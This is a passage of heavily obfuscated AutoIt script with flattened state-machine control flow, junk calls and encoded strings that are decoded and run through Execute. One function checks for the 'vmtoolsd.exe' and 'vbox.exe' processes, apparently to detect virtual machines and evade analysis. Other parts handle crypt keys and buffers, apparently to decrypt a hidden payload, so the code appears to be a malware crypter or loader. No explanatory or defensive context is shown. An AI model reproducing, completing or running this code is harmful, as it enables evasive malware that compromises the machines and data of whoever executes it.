(LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , ZVTZJDNXHRPQQIM ("54" ) , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..0,4..9..,4..1..,4..4..,30" , ".." ) ) , "" , ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("3..4,2..7..,40,3..0,3..8..,..31.." , ".." ) ) , "" ) $1027989821 = 176683708 ENDIF IF $1027989821 = 1203322726 THEN $DBGGPSHIBQGJ ($FILEHANDLE ) $1027989821 = 113519199 ENDIF IF $1027989821 = 1300820860 THEN $NPTGNKISXCCR ($FILEHANDLE , $BYTES ) $1027989821 = 1203322726 DIM $2CGYKWLYPSNSIE1FFBSM = 1138330 + 4292028284 * 2422679 + 1451894 ISPTR (3910360 * 133122 + 1965520 ) ENDIF INT (3334982 ) NEXT ENDIF ENDFUNC FUNC IRWNOKLXLW () LOCAL $ARRAY = [LUXBZMCWKPOC ("vm..t..oo..ls..d.....exe" , ".." ) , LUXBZMCWKPOC ("v..b..o..x.ex..e.." , ".." ) ] FOR $I = ZVTZJDNXHRPQQIM ("53" ) TO $PSZKHZKXAIEO ($ARRAY ) - ZVTZJDNXHRPQQIM ("54" ) IF $SNOJUKVVIBEY ($ARRAY [$I ] ) THEN $RSOIAVQHRSRB ($JGTQIAOTJUVQTGIWELJCIUBHILITIMWCZYTJWHKFENIYTKYVVORLPCQPFMH ) ENDIF NEXT ENDFUNC FUNC ZUILJTNRKW () ENDFUNC FUNC URQHLYEYWJ ($VDATA , $VCRYPTKEY , $RT ) GLOBAL $116925729 = 256356752 GLOBAL $AXUAUFRJKZ = 356708 FOR $E = 0 TO 2315332 CHR (1208239 ) IF $116925729 = 38669117 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57..,..5..7..,59..,..3..,59,..3..,57,..56..,59..,..5..4,..59..,3..,..59,3,5..5,..6..1,5..5,5..7..,5..8,6,58..,..6,..59..,6..0..,..58..,6,..59..,54,57,..5..6,6..0..,55..,6..0,62..,..6..0..,..5..3,..6..0..,57,..5..7..,6..2..,..59..,5..,..6..0,..57,59..,..58..,..6..0,..5..5..,..59..,5,5..9,5..4..,59,3..,..57..,..5..7,5..9..,..54..,..6..0..,57,..59,..5..4,..5..8..,..2,..56..,5..4,..5..8,4..,55,..3..,..5..5..,..5..3..,..5..5..,5..5..,59,55..,..5..9,..6,..59..,..6,..5..9,..3,55..,..55..,55,3..,..55..,..53,5..5,..5..5..,5..7..,56..,60..,..55,..6..0,..6..2..,6..0,..5..3,60,..57..,..57,..61..,59..,..54,60,..5..6..,5..9..,61..,..57,..5..7,..5..9..,..54..,..60,..57..,5..9,5..4,5..5,..5..5,..55,..3,55..,..53,55,..5..5..,59,6..1..,59..,..5..4,..5..9,5,..59..,..5..7..,..59,3..,5..9..,..58..,55,55..,..5..5..,3..,..55..,5..3,5..5..,57,..59..,..61,5..7..,5..6..,..6..0..,..55..,6..0..,..62,60..,..5..3..,..6..0,..5..7,..57,..6..1,..59..,54,..6..0,..5..6,5..9..,..61..,5..5..,3..,..5..5..,..53..,55..,..5..5..,6..0,..5..6,..60..,..5..7,..60..,..5..5..,..60..,5..8..,..59..,..56,..6..0,..5..7,..55..,..1,5..5,5..5,..5..5,..3..,..5..5..,..53,..55..,5..7,..6..0,5..7,..5..7..,..55..,6..0..,..5..8..,59,59,..59..,59,..5..5..,3..,55..,5..3,55,..5..5,..5..9,57,60..,..6..0..,..59..,..6,6..0..,..55,..5..9..,..5..7..,5..5..,..55..,55,..3..,55,53..,..57..,..5..7,59..,..3..,..59..,..3,..58..,..5..6,..60..,..57..,..60,..55,..6..0..,..58..,..59,56..,..60,57..,..5..7,6..0,..59..,..5..8,6..0..,57,..58,5..6..,..5..9..,62..,..6..0..,1..,5..9..,5..8,55..,61..,..55..,5..7,6..0..,57..,57,..55,..60..,5..8,..5..9,5..9,..59,..5..9,5..5,..6..2..,..55..,..3..,5..5..,5..3..,..5..5..,..5..5..,..59..,..5..7,60,6..0,59,6..,..6..0..,55..,59,5..7..,..5..5..,..5..5,5..5,3,55,..5..3,..5..6,5..4,..55,..6..2.." , ".." ) ) ) ) $116925729 = 2032766480 ENDIF IF $116925729 = 39019882 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7..,..57..,59,3,..59,3,..5..8,56..,..60,..57..,6..0..,55..,6..0..,..58,..59,..56..,..60..,5..7,5..7,5..6..,..6..0,..55,59..,5..8..,..59..,5..4..,60..,..5..7..,59,..58,..55..,..61,..55..,5..5..,..5..9..,5..5,6..0..,..62..,6..0,5..7..,5..9,58..,..58,..2..,..55,..5..5..,..55,5..3..,55,..59,55,5..3,..5..7,..55,..59,..6..2,..59,..5..,59..,..54,60..,55..,..60..,6..2..,5..7,..3,59..,58..,59,5,..55,..6..1..,..55..,5..7,6..0,5..9,..57..,5..7,..5..9..,..54,..60..,..57..,..59..,5..4..,55..,62..,..55..,5..3..,5..5..,2..,55..,..53..,..55..,..55,..56..,54,56..,53..,..5..6,..5..3..,..56,..5..3,..5..5..,..5..5..,55..,..53..,..5..5..,..5..9..,55..,..53..,5..5,..55,5..8..,..4,55..,55..,5..5..,..6..2.." , ".." ) ) ) ) $116925729 = 1885155689 DIM $LBINXWLC6CKU003KSYO1 = 2531406 * 689670 + 583371 * 3016559 + 3767019 STRING (216981 + 4294830286 ) ENDIF IF $116925729 = 61093985 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..5..0,..5..7..,5..7..,5..9..,..3,5..9..,..3,..58..,..56,6..0,5..7,6..0,..55..,6..0..,58..,59..,..56,60..,5..7,..5..8,5..6..,59..,..5..8..,..6..0,57..,..5..7..,..5..7..,..59,..54,..60,5..7..,..5..9..,54,5..5,6..1..,5..5..,57..,..60,5..7,5..7..,62,..59,..5,6..0..,..53,60..,58,..60..,..57..,..5..5,3,55..,..53,..5..6..,..54..,55..,3..,..55,53,..55..,5..7..,59,55,5..7,..5..5,5..9,6..2..,5..9,5,..59..,..5..4..,6..0,55,..6..0,62..,5..5..,6..2" , ".." ) ) ) ) $116925729 = 1053930317 STRING ("cUJodtOqAs0Q1peCLdghXZVWVuigmg5qItqyuFfLjy3qnyRWhT62podn9XDSlHdtwIgH8Qig7D8y5DIvNv9DkdaupdyGbwzKuJ3NriY" ) ENDIF IF $116925729 = 92596336 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("53" ) ] -= ZVTZJDNXHRPQQIM ("54" ) ISPTR ("rEnhd0IJjtHWr5qKeKdxevK4eEGH2ujofKW4t4sJbUAJgF13k9VsS2J54tcIsbRYktQRjvrkrDvt5bY" ) $116925729 = 1604509846 ISBINARY ("J0Fma0a91UqacMyWZjUYSKaoFqa3ED4NOYntYCRsvrsHmvrsLcTE4Hk9ZqRT0hEw0Mvnyf8vBACArCbk8SqBVyTgNnEGW7BoW5SJ9d3Gew" ) ENDIF IF $116925729 = 113519199 THEN LOCAL $TTEMPSTRUCT $116925729 = 1027989821 MOD (2055517 , 3023122 ) ENDIF IF $116925729 = 116471326 THEN $VRETURN = $ARET [ZVTZJDNXHRPQQIM ("58" ) ] $116925729 = 1196440215 ENDIF IF $116925729 = 176683708 THEN LOCAL $B = $E (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("28,35,..40..,..27..,..44..,5..1..,4..6..,..4..1,..4..5,..4..6,4..4..,..3..5,40,3..3.." , ".." ) ) ) $116925729 = 1300820860 ENDIF IF $116925729 = 256356752 THEN LOCAL $E = EXECUTE $116925729 = 176683708 ENDIF IF $116925729 = 432319576 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50..,..5..7..,..57,..5..9,3,..5..9,3,5..7,56..,59..,..54..,..5..9..,3,5..9..,..3..,5..5..,..6..1..,..5..5,5..7..,5..8..,..6..,58..,..6..,..5..9..,6..0..,..5..8,..6,59,..5..4,57,..56..,..6..0,5..5..,..60,..62..,..60,5..3,..6..0,..5..7,..5..7,..62..,..5..9,..5,..6..0,5..7..,..59..,..58,..60,..5..5..,5..9,..5..,5..9,..54,5..9..,3,..5..7,57,..59..,54,..60,..57..,5..9..,..54,5..8..,..2..,..55..,..55,..56..,..5..4,55..,5..5,58,..4,..5..5..,3..,5..5..,5..3,..55,..55..,59..,5..5,59..,6,5..9,6..,..5..9..,..3..,..5..5..,5..5..,..5..5,3,..5..5,..53..,..55..,..55..,57,..5..6..,..60..,..5..5,..6..0,62,..60..,53,..6..0,5..7..,5..7..,57,..59,..58..,60..,5..6,..6..0,..57..,..6..0..,5..5,59,6,60,6..2..,5..7,2,5..9..,..5..8..,6..0..,62,5..5..,5..5..,..55,3,55..,5..3..,..55..,..5..5,..5..9..,..61..,..59,54..,59,5,..5..9..,5..7..,..5..9,3..,..59,58,..5..5..,..55..,..55,..3..,..5..5,..5..3..,55..,..5..7,60,59..,5..7,..5..6,..60..,55,..60..,6..2..,..60,5..3..,60,..5..7,..5..7,2..,5..9,58..,6..0,..62..,..55..,..62" , ".." ) ) ) ) ISPTR ("vpb3FhrqmtxUtqRVDS6MXJE1fvLYuZtfNnfMnQOCjsqOZ4" ) $116925729 = 92596336 CHR (439850 ) ENDIF IF $116925729 = 586524435 THEN LOCAL $A_CALL = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50..,..5..7..,..57..,..5..9,3..,59,3,..5..7,56,5..9..,..54,59..,..3,..5..9..,..3..,..5..5..,61..,5..5..,..5..5..,..5..9..,5..,60..,..57,..59..,5..7,..5..9..,3,5..9..,..3..,..5..5..,..5..,59..,..57..,59,3..,59..,..3,..55,55,..5..5,3..,5..5,..53..,5..5,..5..5,..59..,..6..2,59..,5..,60,57,55,55..,..5..5,..3..,..5..5,5..5..,..58..,55,6..0..,5..7,..5..9..,3,..5..7..,..57..,..5..9..,5..8..,59..,..56,59..,6..,59,..4..,..6..0..,..53..,60..,55,..59..,..58..,..6..0..,..56,..6..0,5..6..,..5..7..,..5..5..,60,..58,5..9,5..9,..5..9..,..5..9..,59..,5..8..,..60,55..,..5..5..,..5..5,..5..5,..3..,..5..5..,..5..5,..6..0..,58..,6..0..,56,5..9..,..6..1,..5..9,6,..60,5..5,..60..,5..7..,55,..55..,..5..5..,..3,..5..5,5..3,5..6,..55,55,..3..,..55..,..55,..6..0..,53,60,..5..7,6..0,..5..5..,5..5,55..,55,3,55..,53..,5..7,..57..,59..,..3,..5..9..,..3,..58..,56..,6..0,..57,60..,..5..5,..6..0,..58..,..5..9..,..5..6,..60..,..57,5..7..,6..0..,59..,5..8,..6..0,5..7,..5..8..,..53..,..60,..57..,60,5..5,55,..61,..55,..5..7,6..0,..5..7,5..7..,..55..,..6..0,5..8,..5..9,5..9,..5..9..,..5..9,59..,..58,60..,55,5..5..,62,55,3,5..5,..55..,59..,5..7,60,60,..59..,6,..6..0..,55,..59..,5..7,55,5..5..,..55..,..3,..5..5,5..3..,..5..7,..57..,5..9,..3,5..9..,..3..,58..,..56..,60..,5..7..,..60..,..5..5..,..60,5..8..,..5..9..,..5..6..,..60,5..7..,5..7,..60,59..,..5..8..,60,..57..,5..8..,5..6,..59,..6..2,60..,..1..,5..9..,..58,5..5,61,55..,..5..7,..6..0..,5..7..,..57,..5..5..,..60,..5..8,59,5..9..,59..,..59,59..,..5..8..,..60..,..55,..55..,62,55,3..,55,..5..5..,..60,..53,6..0,57,..60..,5..5,..5..5,5..5,..55,3..,..55,..5..3..,..5..7..,57,..59,3,..59..,..3..,58,..56..,60..,..57,..60,..55..,..60..,..58..,59,5..6..,..6..0..,..5..7,5..7,60,..5..9,58,..6..0..,..5..7..,58..,5..3..,..6..0..,5..7,..6..0,5..5,..5..5..,..61..,..5..5,..57..,60,57..,57,..62..,5..9..,5,..6..0,53..,..6..0,..58..,..60..,..57,..5..5..,62..,..5..5,..3,..5..5,5..5..,5..9..,..57..,..6..0,6..0..,59,..6,60..,5..5,59..,5..7..,..5..5..,..55..,..5..5..,3,..55,5..3..,5..7,5..7..,5..9..,..3..,..5..9..,..3..,..58..,..56..,..60,57..,60..,5..5..,..60..,..58..,59..,5..6,6..0,..5..7..,57..,..6..0,5..9,5..8..,..60,..5..7..,58,..56..,..5..9..,6..2..,..60,..1..,..5..9,..58..,..55,..6..1,..55..,..5..7,60..,5..7,..57,..6..2,59..,..5,..6..0..,5..3,..6..0,..5..8..,..60..,5..7,..5..5,6..2..,5..5..,..3..,..55,5..5..,..5..9,..5..7..,..60,..60,..5..9,..6,60..,..55,59..,5..7..,55..,1..,..55..,..5..5,5..5..,3..,..5..5..,53..,..5..6,..5..3..,5..5,6..2" , ".." ) ) ) ) ISBOOL (3036564 * 693275 ) $116925729 = 1453481599 RANDOM (1505347 ) ENDIF IF $116925729 = 737653776 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,50,57,..57,5..9,..3,..5..9..,..3,..5..8,..56,..6..0..,..57,..60,5..5,..6..0..,5..8,5..9..,..56..,6..0,..57,58,..5..6..,59..,5..8..,..60..,5..7,57,5..7,..59..,..5..4,6..0,5..7..,..5..9..,54,..5..5,..61..,..55..,..57,60..,..5..7..,57..,55,60..,..58,..59..,..59..,59,..5..9..,..55,3,55,53,5..7,..58..,..6..0,61..,..5..9..,..5..8..,..59,56..,60..,5..8,6..0..,..5..7,5..9,..5..8..,5..5..,6..1..,56..,5..4,5..5..,..6..2..,55..,..3,55..,..53..,..5..5,..5..7,6..0..,..5..9,..5..7,56,..60..,..55,60..,..6..2,..60..,..53..,..60,5..7..,5..7..,2,59..,58..,60,..6..2,55,..62" , ".." ) ) ) ) $116925729 = 38669117 DIM $CCES0BLSID4XMQ3MS2D2 = "7Qw3NGZ6rQ3NdvrgC5iL1wzb9XblC2lD4IFWhzlEww1wbUi5KG075qMKqv4" ENDIF IF $116925729 = 781366022 THEN LOCAL $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..5..0..,57,..5..7,5..9..,3,59,..3..,57,..56..,..5..9,5..4,..5..9,3,5..9,3..,5..5,..61,5..5,5..7..,58..,..6,58..,6,5..9..,60..,5..8..,..6..,59..,..5..4..,..57,5..6..,..60..,..5..5,6..0..,..6..2,..60..,..5..3,..6..0,..5..7..,..5..7,6..2,5..9,..5..,6..0..,..57,..5..9,5..8,6..0,5..5,..59,..5..,..5..9..,5..4,5..9,3,57..,5..7..,..59..,54..,6..0,..5..7..,59,..54..,58,2..,..56..,5..4..,..5..8,4..,55..,..3..,55,5..3,..5..5..,..5..5..,59..,5..5..,5..9..,..6..,5..9..,..6..,..59..,3..,..5..5,5..5,5..5..,3,5..5,..5..3..,..5..5..,..55,..57..,56,..60..,55,..6..0..,..62,60..,5..3,..60,..5..7,5..7,5..4,5..9,..5..6..,6..0,54..,..6..0..,58,..5..9,6..2,60,55..,..5..9..,..5..8..,..5..7,5..6..,..59,6..,..5..9,5,..60..,57,..5..9,..5..8,60,..61,..60..,..57..,55..,55,..55,..3,5..5..,..5..3..,..5..5,55,..5..9..,6..1,..5..9..,54..,..59,..5..,59,..57..,59,3,..5..9..,58,..55..,..1..,55..,..5..5,..55..,3..,5..5,..53,..5..6,..5..3..,5..5,3..,..55..,..5..3..,5..5,..5..5..,..6..0..,..5..3..,60..,57..,..6..0,..5..5..,..5..5,5..5,5..5..,3..,55..,5..3..,56,..53..,..55..,3..,..55..,53..,..5..5..,55..,..60,5..3,6..0,57,6..0,..55..,55,..5..5..,5..5..,3,..55,53..,..5..6,..5..3..,55..,3..,55,..53,5..5..,..55..,5..9..,5..7..,..6..0..,..60..,5..9,..6,..6..0..,55..,5..9..,57,55..,..55,..5..5,..3,55,..5..3,..5..6,..5..5,56,57,55,..3,55,5..3,..5..5,..55,59,..57,60,..6..0,59,..6,..6..0,55..,5..9,5..7,..5..5..,5..5..,..5..5,..3..,5..5..,53..,55,..55,5..6..,..5..3..,..60..,..6..1..,..57,..59..,..56..,..53..,56..,53,5..6..,53,56,..53..,5..6,5..3..,..5..6..,53,..5..6,..5..3..,55..,..55..,..5..5,62.." , ".." ) ) ) ) ISBINARY ("EyUEZE8dTNpEEc9pNgK6coIN65FWEu9U3B2LaNffHWnqbhfn" ) $116925729 = 864731176 ENDIF IF $116925729 = 848901156 THEN $ARET = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,..50..,57..,..5..7,..5..9..,..3..,..5..9,3,..57,56..,59..,54..,..5..9,3..,..5..9..,..3,..5..5..,61,..55..,..57..,..58..,6..,5..8..,..6,..5..9..,60..,..58..,6..,..59,..5..4..,5..7,..5..6..,60..,..55,6..0..,..6..2,6..0,..5..3..,6..0,57,..5..7..,62,..59,..5,..6..0..,57..,..59,5..8..,6..0..,55,..5..9,..5,..5..9,..54,59,..3..,5..7,57..,5..9,5..4..,60,..57,..59,5..4,..5..8,..2..,5..6..,..5..4..,5..8..,..4..,..55..,..3..,5..5..,..5..3..,..5..5,55..,5..9..,55..,..5..9..,..6..,..59,6..,..5..9,3,5..5..,5..5..,55,..3..,5..5..,..5..3,..5..5,..5..5..,..5..7..,..56..,..6..0..,..5..5..,..6..0..,..6..2,..6..0..,53,..60,..5..7..,5..7..,..56..,60,5..5,59,..58..,..59,54..,60,..5..7..,..59..,..58..,5..7,61,5..9,54..,60..,..5..6..,..59,6..1..,5..5,..55..,55..,..3..,5..5,53,..5..5,5..5..,..5..9..,6..1..,..5..9,..5..4,59..,..5,..5..9,..5..7..,..59,3,5..9,..58..,..55,55,..5..5,..3..,5..5..,..5..3,55,..5..7..,..5..8,..6..,..58..,..6,..5..9..,..6..0..,58,6,59..,5..4,57..,56..,..6..0,5..5..,..6..0..,62,..6..0,5..3..,..6..0,..57..,..5..7,..6..2..,..5..9,5..,60,..57..,..59..,5..8,60,55,59..,5,..59,..54,5..9,3,57,5..7,..5..9..,..5..4..,60,57..,5..9,..5..4..,..58..,2..,..56..,..55..,5..8,..4,55..,..3..,..5..5..,..5..3,..55,..5..5..,60..,..58..,..5..9,62,5..9..,5,..6..0..,57,..5..5..,55,..5..5,3,5..5,53,..55..,..55..,56..,..53..,6..0,61,..5..6,5..3..,..5..6..,..53,5..6..,53,..5..6..,..5..3,..5..6,..61..,..56..,53,..5..6..,..5..3,56..,5..6,5..5..,5..5,..55..,3..,..55..,53..,..5..5,..5..5..,60..,..53..,6..0..,..57,60..,..5..5..,55..,..55,..55..,3..,..55..,53,..56,5..3,5..5,..3..,..55..,..53..,..5..5..,55,5..9..,57,6..0,..6..0,..5..9,6..,..6..0..,5..5..,..59..,5..7..,55,55,5..5..,..3,5..5,5..3..,5..6,..5..3..,..5..5,3,5..5,..53,..55..,5..5,..5..9,6..1..,59..,54,5..9,..5,..59..,57,5..9..,..3,59..,..5..8..,..55..,1..,55..,..5..5,55..,3..,5..5..,53..,..56,53,..5..5..,..6..2" , ".." ) ) ) ) $116925729 = 1718368979 ISBOOL (3936637 + 4293346114 ) ENDIF IF $116925729 = 864731176 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("55" ) ] = $ARET [ZVTZJDNXHRPQQIM ("54" ) ] ISBOOL ("wpaaFxpbrLYZsz0hKSwf" ) $116925729 = 1808850186 WINEXISTS ("lgunYMFGc" ) ENDIF IF $116925729 = 954977294 THEN LOCAL $TINPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,5..0,57..,..57..,..59,3,59..,..3..,..58..,..56,..6..0..,..57,..60..,5..5,..60,..5..8..,..59,..56..,..60,57..,5..7..,56,..6..0,55..,..59..,5..8,5..9..,5..4,60..,..57..,..5..9..,5..8,55..,..61..,5..5..,..5..5,..59..,..5..5,60..,6..2..,..60,57,59..,..5..8,..5..8,..2,55..,..55..,..5..5,53..,..55..,..5..9..,55..,5..3,5..7..,5..5..,..5..9..,..6..2..,..5..9,..5,..5..9,5..4,..60..,5..5,..6..0,..62,5..7..,..3,..5..9,..58,5..9,..5..,..55..,6..1,5..5,..57,59,..5..5,57..,55..,..59..,..6..2..,..59..,5..,..59,..54..,..60,..55..,..6..0,6..2..,..5..5,62,55..,..53..,..55,5..9..,55,5..3..,55,55..,..58,..4,..55,..5..5..,55,..6..2.." , ".." ) ) ) ) $116925729 = 61093985 ENDIF IF $116925729 = 1027989821 THEN LOCAL $IPLAINTEXTSIZE $116925729 = 1138660241 ENDIF IF $116925729 = 1051260188 THEN $TBUFF = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,5..0,..57,..57,..5..9..,3,59,3,5..8,56,6..0..,57,60..,..5..5,6..0..,5..8..,59..,5..6..,..6..0..,5..7,5..7,..56..,..60..,..5..5..,..5..9..,..58..,..5..9..,54..,60,..57,5..9,5..8..,5..5,6..1..,..5..5..,55..,59..,..5..5..,..60..,6..2,6..0,..57,..59..,..58..,..58..,2..,..55..,..55..,..55..,..5..3..,..55..,59,..5..5..,..53..,..57..,5..5..,..5..9..,..62..,..59,5..,..5..9..,5..4..,..6..0..,..55..,60,62,..57..,..3,..5..9..,..58..,5..9..,..5..,55,..6..1..,5..5,5..7..,..60,..5..9..,57,5..6..,..60,5..5..,60..,..6..2..,60,53..,..6..0..,57..,..5..7..,..2,5..9,58..,..6..0..,..62,..55,..6..2..,..55,5..3..,5..5,..59..,55..,53..,5..5..,..55..,..58..,4,5..5,55..,55,62.." , ".." ) ) ) ) INT (178616 ) $116925729 = 737653776 RANDOM (2170536 ) RANDOM (3316550 ) ENDIF IF $116925729 = 1053930317 THEN LOCAL $TBUFFER = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,..50,..5..7,5..7,..5..9..,..3,..59,3,..5..8..,56,60..,57..,..60,..55..,..6..0,5..8..,5..9,..5..6,..60,..5..7..,5..7,5..6,60,..5..5..,59..,..58,..59,..5..4,6..0..,..5..7,..59..,5..8..,..5..5..,6..1..,55,..5..5,5..9..,55,..6..0,..62..,..60..,..57,59,58..,..58,..2..,..5..5,55..,..5..5..,5..3,55,..5..9,..5..5,..5..3,..56,..5..4..,..5..6,..5..9,55..,..53..,..5..5,..1..,..5..5,..5..3,..57,57..,5..9,..3..,..59..,..3,58,..5..6,..6..0,57,60,..55,..60..,58..,..5..9,..56,6..0,57..,..57,6..0..,..59,..5..8..,60,5..7,..5..8..,56,..59..,6..2..,..6..0..,1,..5..9..,58,5..5..,..6..1..,..5..5..,..57..,60,..5..7..,5..7,6..2..,..59,..5..,..6..0,53..,..6..0..,..58,60,5..7,5..5,6..2..,..55,..5..3..,..5..5,59..,55,..53,..5..5..,55..,..58,..4..,..55..,55,..5..5..,62.." , ".." ) ) ) ) $116925729 = 586524435 INT (3174530 ) ENDIF IF $116925729 = 1070530058 THEN $VCRYPTKEY = $VRETURN $116925729 = 39019882 ENDIF IF $116925729 = 1138660241 THEN LOCAL $VRETURN $116925729 = 1924764602 ENDIF IF $116925729 = 1196440215 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3..,50,57..,5..7,59,..3,..5..9,3,57,..5..6,5..9,54..,59..,3,5..9..,3..,55..,61,..55..,..5..7..,..58..,6,5..8..,..6..,59,60..,58,..6..,..59..,5..4,..57..,..5..6,..60..,..55,60,..6..2,6..0..,..5..3..,..60..,57..,..57..,6..2,5..9,..5..,..60..,..57,59..,..5..8..,..60,..55,5..9..,..5..,..59,5..4,..59..,3,5..7,..5..7..,..59..,5..4,60..,5..7,..5..9..,..5..4..,..58,..2..,5..6,5..4..,5..8,..4..,..55,..3,5..5..,..53,..5..5..,5..5..,..5..9,..5..5..,5..9..,6..,..59,..6..,5..9,3..,5..5..,5..5,5..5,..3..,..5..5,..5..3..,55,..55..,..5..7,5..6,60,..55..,..6..0..,6..2..,..60,..53,60,..57..,..57..,..5..7..,..59,..5..8..,..6..0,56,6..0..,5..7..,60,55,59..,6,..6..0,6..2,57..,..6..1..,59..,5..4..,..60,..5..6,..59,61..,..55..,55..,55,3..,5..5..,..5..3,..55..,5..5..,59..,..6..1..,5..9,..54..,59..,5..,..5..9..,5..7,5..9..,..3..,..5..9..,58..,..55,55,..55,3,5..5..,..5..3..,..5..5,..5..7..,..5..9,61..,57..,..56..,6..0,..55,..6..0,..6..2,6..0,..53,6..0..,..5..7..,57..,..6..1,5..9,..54..,..60,..5..6..,5..9,..61..,..55,6..2.." , ".." ) ) ) ) $116925729 = 1070530058 ISBOOL (2885637 + 2030547 ) ENDIF IF $116925729 = 1203322726 THEN LOCAL $TBUFF $116925729 = 113519199 ENDIF IF $116925729 = 1296565717 THEN $IPLAINTEXTSIZE = $ARET [ZVTZJDNXHRPQQIM ("59" ) ] ISSTRING ("vruZKa8jy4MT8EGQdx8SUdvROeh4wrdYYalnlVhrgv8jKZiKHv" ) $116925729 = 2022545531 ISSTRING (2705437 * 2570680 ) ENDIF IF $116925729 = 1300820860 THEN LOCAL $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("56" ) ] ISPTR ("Y58ssDsqQLxelf06Fwazesot3rHKKydI1tX4kso2HSZ7rnTHtJwQWRVFQNya5ROrIZn2s6Vnii2wDqcQIarbcwWkHqnF4o71dGyB9" ) $116925729 = 1203322726 STRING (597511 + 4291688087 + 4294837104 ) ENDIF IF $116925729 = 1453481599 THEN LOCAL $TOUTPUT = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53,..50,5..7..,5..7,5..9..,..3..,..59..,..3..,..58..,56..,..6..0,57,6..0,55,6..0..,5..8,..59,..56,..60..,57..,..57..,5..6,..6..0,5..5..,59,..58..,5..9..,..5..4,60,5..7..,..5..9..,..5..8..,55,..6..1,5..5,..5..5..,5..9..,55..,..60..,6..2..,..6..0,5..7..,..59,5..8..,..58,..2..,55,55..,..55,53..,55..,59..,5..5..,53,..55,..57..,5..9..,5..4..,5..8..,..6..,5..7,56..,..5..9,..54..,..59..,3,..59..,3,5..8..,2,..5..6,59..,58..,..4..,55..,..53..,..55..,59,5..5,..5..3,55..,..55,..5..8,..4,..5..5..,5..5..,55,..3..,5..5,..5..3,57..,5..7..,..59,3..,..5..9..,3,..58..,56,..6..0,..57..,..6..0,..5..5,..60..,5..8,..5..9..,..56..,6..0,57..,57,60..,..5..9..,..5..8,..60,5..7..,..58..,..53,60..,5..7,..60..,55..,..55,..61,..5..5..,..5..7,60..,5..7..,5..7,..55,..60..,58..,59,59,59..,5..9,59,5..8,..60,5..5..,55,6..2..,..55,..62" , ".." ) ) ) ) WINEXISTS ("NplcdubSpt3kbs61JRRU4m3ZivioY5lXbAzrnz5FnOIZNCXff" ) $116925729 = 1947300206 DIM $UKEAWW4SLX3THGIJ3NNK = "lGoNdkOHcjq4jc16851EntAWoSHtnmA30qINpXtlpkjMLz8drM5TXQG1fCyuMut0Sxe2DmQkKOpdkXjZTDcJrSgjUR" STRING (2269520 * 1234892 * 921537 + 4294581480 ) ENDIF IF $116925729 = 1604509846 THEN $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("5..3,50,..5..7,5..7..,5..9..,..3..,..59,3,57,56..,..59..,54..,59..,3,..59,..3..,..55,6..1..,..5..5..,..57,..5..8,..6,5..8,..6..,59,..60,..5..8,..6..,5..9,..54..,57,..5..6,..60..,..55,6..0,62,60,53,6..0..,57..,57,6..2..,..59..,5,60,..5..7..,59..,5..8..,6..0,..5..5..,..59,5,..59,..54..,..5..9..,3..,..5..7..,..5..7..,..5..9..,..5..4..,60..,57,5..9,..54..,5..8..,..2,56..,..5..4..,5..8..,4,..5..5..,3,55..,..53,55..,..5..5..,5..9,5..5,59..,..6..,59..,6,..5..9,..3..,55,..5..5..,55,3,55..,..53..,..55,5..5..,57,56..,..6..0,55,..60,6..2,6..0..,53..,6..0..,5..7,5..8..,5..5,5..9..,..5..8,5..9..,..3..,59..,58..,..5..9,..54..,..60..,56..,..5..9..,5..8..,5..7..,5..6..,5..9,6..,5..9,..5..,..6..0..,57..,..5..9,5..8,60..,61,..6..0..,..5..7,5..5,55..,..55,..3,5..5,..53..,55,5..5..,5..9..,..6..1,..59..,54,59,5,..59..,..57..,..5..9..,3,..5..9,..58,..5..5..,..5..5,..5..5..,..3,..5..5..,..5..3,55..,57..,58..,6,..5..8,6,59,..6..0..,..58,6,..5..9..,..54,..57,5..6..,..6..0..,5..5,..6..0..,6..2..,6..0..,5..3,6..0,..57..,5..7..,..6..2,..5..9,..5,..60..,..5..7,5..9..,..5..8,6..0,5..5,59..,5..,5..9,..54..,..5..9..,3..,..57,..5..7..,59,..5..4..,6..0,57..,5..9..,..5..4..,58..,..2,..56..,5..5..,..5..8,4..,55..,3,..55,..53,..5..5..,..55..,..5..9..,5..7..,60..,6..0..,..59..,..6,6..0,..55..,..59,57,..5..5,55,..5..5,..3,..55,53,..5..6..,53..,..55..,..62" , ".." ) ) ) ) RANDOM (2988315 ) $116925729 = 2060391673 ENDIF IF $116925729 = 1655436234 THEN $__G_ACRYPTINTERNALDATA [ZVTZJDNXHRPQQIM ("54" ) ] = $E ($B (ZVTZJDNXHRPQQIM (LUXBZMCWKPOC ("53..,..50,..5..7,..5..7,59..,..3,..59,3..,5..7..,6,60..,..53,59,..5..8..,..5..9,5,55,..6..1,5..5..,..55..,..57,..5..4,5..9..,57,..6..0,59..,..59,54..,60,..53,..5..9,..6..2..,56..,..5..6,5..6,..55..,..55,5..,..59,57..,..5..9..,3,..5..9..,..3,..55..,55..,..5..5..,..62.." , ".." ) ) ) ) INT (2325981 ) $116925729 = 781366022 INT (2956702 ) INT (3649111 ) ENDIF IF $116925729 = 1713506615 THEN 